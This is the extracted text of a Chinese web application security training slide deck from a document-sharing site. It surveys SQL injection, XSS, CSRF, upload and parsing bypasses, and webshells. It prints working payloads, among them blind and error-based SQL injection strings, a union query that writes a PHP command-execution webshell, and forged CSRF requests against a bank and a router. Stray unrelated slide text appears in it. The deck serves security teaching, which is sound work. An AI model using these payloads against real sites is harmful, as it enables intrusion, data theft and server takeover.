WEB应用安全培训-课件_第1页
WEB应用安全培训-课件_第2页
WEB应用安全培训-课件_第3页
WEB应用安全培训-课件_第4页
WEB应用安全培训-课件_第5页
已阅读5页,还剩45页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

WEB应用安全培训WEB应用安全培训常见WEB漏洞常见WEB后门介绍常见WEB漏洞常见WEB后门介绍精品资料精品资料你怎么称呼老师?如果老师最后没有总结一节课的重点的难点,你是否会认为老师的教学方法需要改进?你所经历的课堂,是讲座式还是讨论式?教师的教鞭“不怕太阳晒,也不怕那风雨狂,只怕先生骂我笨,没有学问无颜见爹娘……”“太阳当空照,花儿对我笑,小鸟说早早早……”WEB应用安全培训-ppt课件漏洞名称漏洞等级SQL注入高危跨站脚本攻击漏洞高危Cookie欺骗高危CSRF(跨站请求伪造)中危Web信息泄露中危权限问题中危逻辑漏洞中危第三方程序漏洞高危Web服务器解析漏洞高危弱口令高危SSRF中危常见的Web漏洞漏洞名称漏洞等级SQL注入高危跨站脚本攻击漏洞高危CookiSQL注入漏洞介绍

由于程序中对用户输入检查不严格,用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQLInjection,即SQL注入。原因分析

其本质是由于对输入检查不充分,导致SQL语句将用户提交的非法数据当作语句的一部分来执行。SQL注入漏洞介绍SQL注入SQL注入分类:按提交字符类型可分为:数字型字符型搜索型按HTTP提交方式可分为:GET、POST、Cookie按注入方式可分为:盲注、union注入、报错注入、基于时间注入编码问题:宽字节注入SQL注入SQL注入分类:SQL注入如何判断?1.单引号判断2.数字型注入判断①and1=1and1=2and1isnulland1isnotnullanduser>0②参数进行运算+1-1'+'→'%2B'3.字符型注入判断①'and'1'='1'and'1'='24.搜索型注入判断①test%'and1=1and'%'='test%'and1=2and'%'='SQL注入如何判断?SQL注入-相关表Sysobjects,syscolumnsInformation_schema.TABLES[Table_schema][table_name]Information_schema.COLUMNSuser_tab_columnsuser_tables

SQL注入-相关表SQL注入-盲注Accessand(selecttop1asc(mid(id,1,1))fromadmin)>0MSSQLand(selecttop1ascii(substring(password,1,1))fromadmin)>0MysqlAnd(selectascii(substr(pass,1,1))fromadminlimit1)>0oracle

And(selectascii(substr(pass,1,1))formadminwhererownum=1)>0SQL注入-盲注AccessSQL注入-报错and(selecttop1namefromsysobjects)=1and(select1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23||utl_inaddr.get_host_name((select

bannerfromv$versionwhererownum=1))–

SQL注入-报错and(selecttop1nameSQL注入MySQL写文件and1=2unionselect1,2,'<?phpsystem($_REQUEST[cmd]);?>',4,5,6intooutfile'C:/apache/htdocs/site/shell.php‘Load_file(读取文件的路径)SQL注入SQL注入搜索型注入Select相应字段from[表名]where搜索条件Like'科技%'and1=1and'%'='%'[搜索关键字]%'and[payload]and'%'='SQL注入SQL注入自动化工具SQLMAPSQL注入自动化工具SQLMASQL注入自动化工具HavijSQL注入自动化工具HavijSQL注入自动化工具PangolinSQL注入自动化工具PangolXSS跨站脚本攻击漏洞介绍

恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。XSS本质是在于执行脚本[javascript/html等]攻击者的js能力越强攻击效果越惊人!XSS漏洞分类:①反射型XSS

②存储型XSSXSS跨站脚本攻击漏洞介绍XSS跨站脚本攻击XSS的危害通过XSS执行的javascript,可以做到…窃取你正在浏览的cookies信息篡改你正在浏览的页面,注入误导信息捕获你的所有操作,并发送给黑客从定向到黑客的钓鱼站点利用浏览器的漏洞控制你的机器…XSS跨站脚本攻击通过XSS执行的javascript,可以持久型跨站脚本攻击场景1.正常服务器信息2.服务器存储恶意代码3.用户浏览网页4.服务器将恶意代码返回给用户5.客户端浏览器执行恶意代码Web服务器重要通知Re:沙发!!Re:地板?Re:地下室沙发……Re:地下室地板-_-!!Re:免费获取Q币!!!内容:<script>恶意代码</script>Re:谁又发垃圾广告啦?1普通用户客户端34恶意代码执行!5攻击者在论坛发帖子:免费获取Q币!!!<script>恶意代码</script>2持久型跨站脚本攻击场景1.正常服务器信息2.服务器存储恶XSS跨站脚本攻击注册用户发帖,内容如下所示XSS跨站脚本攻击XSS跨站脚本攻击Admin用户登录浏览刚才的帖子XSS跨站脚本攻击非持久型跨站脚本攻击场景浏览器浏览器Outlook正常访问恶意代码隐藏在链接中“reflected”代码1From:攻击者To:用户免费赠送Q币!!!CLICKHERE恶意代码安全上下文:目标站点普通合法会话安全上下文:目标站点攻击者Web服务器普通用户客户端12345恶意代码执行!非持久型跨站脚本攻击场景浏览器浏览器Outlook正常访问恶XSS跨站脚本攻击反射型XSSXSS跨站脚本攻击反射型XSSXSS跨站脚本攻击XSS攻击平台XSS跨站脚本攻击XSS攻击平台CSRF跨站请求伪造CSRF是什么?CSRF(Cross-siterequestforgery)跨站请求伪造。你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及财产安全。CSRF跨站请求伪造CSRF是什么?跨站请求伪造(CSRF)场景攻击者:小明受害人:老王银行网站:www.xxx.com恶意网站:www.B.com1.A银行转账链接:/Transfer.php?toBankId=666&money=10002.<imgsrc=.xxx.com/Transfer.php?toBankId=777&money=1000>跨站请求伪造(CSRF)场景攻击者:小明CSRF跨站请求伪造针对路由器的攻击m.htm?dhcpserver=1&ip1=00&ip2=99&Lease=120&gateway=&domain=&dnsserver=&dnsserver=&dnsserver2=&Save=%25B1%25A3+%25B4%25E6CSRF跨站请求伪造针对路由器的攻击Cookie欺骗Cookie用于身份验证本地可控Cookie欺骗CookieCookie欺骗示意图通过用户名密码认证后将用户信息存储在Cookie里.但是在做Cookie认证的时候,只读取了Cookie里面的用户名信息.Cookie欺骗示意图通过用户名密码认证后将用户信息存储在C验证不充分之上传漏洞客户端检测(javascript扩展名检测)浏览器禁用JavaScript服务端检测(MIME类型检测)伪造Content-type:image/gif服务端检测(文件头检测)伪造文件头(GIF89a)服务端检测(目录路径检测)%00截断服务端检测(文件扩展名检测)①白名单②黑名单验证不充分之上传漏洞客户端检测(javascript扩展名检验证不充分之文件包含易受攻击的代码片断:<?php$content=$_GET['content'];include($content);?>攻击者用如下请求可以包含图片木马:验证不充分之文件包含易受攻击的代码片断:验证不充分之任意文件读取验证不充分之任意文件读取验证不充分之变量覆盖易受攻击的代码片段:<?phpif($pass=="hello"){$auth=1;}Parse_str($_SERVER['QUERY_STRING']

);if($auth==1){echo"someimportantinformation";}?>

上面的代码首先检查用户的密码是否为"hello",如果匹配的话,设置"$auth"为"1",即通过认证。之后如果"$suth"为"1"的话,就会显示一些重要信息。这段代码假定"$auth"在没有设置值的时候是空的,但是攻击者可以创建任何全局变量并赋值,通过类似""的方法,我们完全可以欺骗这段代码,使它相信我们是已经认证过的。验证不充分之变量覆盖易受攻击的代码片段:逻辑漏洞不同的用户错误判断出存在admin用户逻辑漏洞不同的用户错误逻辑漏洞找回密码设计缺陷修改任意用户密码逻辑漏洞找回密码设计缺陷修解析漏洞IIS6.0解析漏洞①目录解析/test.asp/test.jpg②文件解析/test.asp;1.jpgIIS6.0默认的可执行文件除了asp还包含这三种①/test.asa②/test.cer③/test.cdx解析漏洞IIS6.0解析漏洞解析漏洞Apache解析漏洞Apache是从右到左开始判断解析,如果为不可识别解析,就再往左判断。/test.php.xxx/test.php.rar解析漏洞Apache解析漏洞解析漏洞Nginx解析漏洞影响版本:0.5.,0.6.,0.7<=0.7.65,0.8<=0.8.37/test.jpg/1.php/test.jpg%00.php解析漏洞Nginx解析漏洞第三方漏洞①FCKeditor编辑器上传漏洞,任意创建文件漏洞②eWebEeditor编辑器,上传漏洞,遍历目录漏洞③ThinkPHP任意代码执行漏洞④Struts2远程命令执行漏洞⑤Web中间件(Tomcat、Weblogic、Jboss)第三方漏洞①FCKeditor编辑器上传漏洞,任意创建文件Struts2远程命令执行Struts2远程命令执行tomcattomcatJBossJBossFckeditor/ewebeditor/kindeditor遍历目录上传漏洞构造相应语句Fckeditor/ewebeditor/kindedito弱口令什么是弱口令?弱口令(weakpassword)没有严格和准确的定义,通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。

弱口令指的是仅包含简单数字和字母的口令,例如“123”、“abc”等,因为这样的口令很容易被别人破解,从而使用户的计算机面临风险,因此不推荐用户使用。

弱口令什么是弱口令?弱口令

TOMCAT弱口令直接上传WEBSHELL弱口令TOMCAT弱口令直接上传WEBSHELL弱口令

针对弱口令的爆破Burpsuite、Hydra等弱口令针对弱口令的爆破Bu常见WEB后门介绍什么是WEBSHELL?顾名思义,“web”的含义是显然需要服务器开放web服务“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户(入侵者)通过网站端口对网站服务器

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论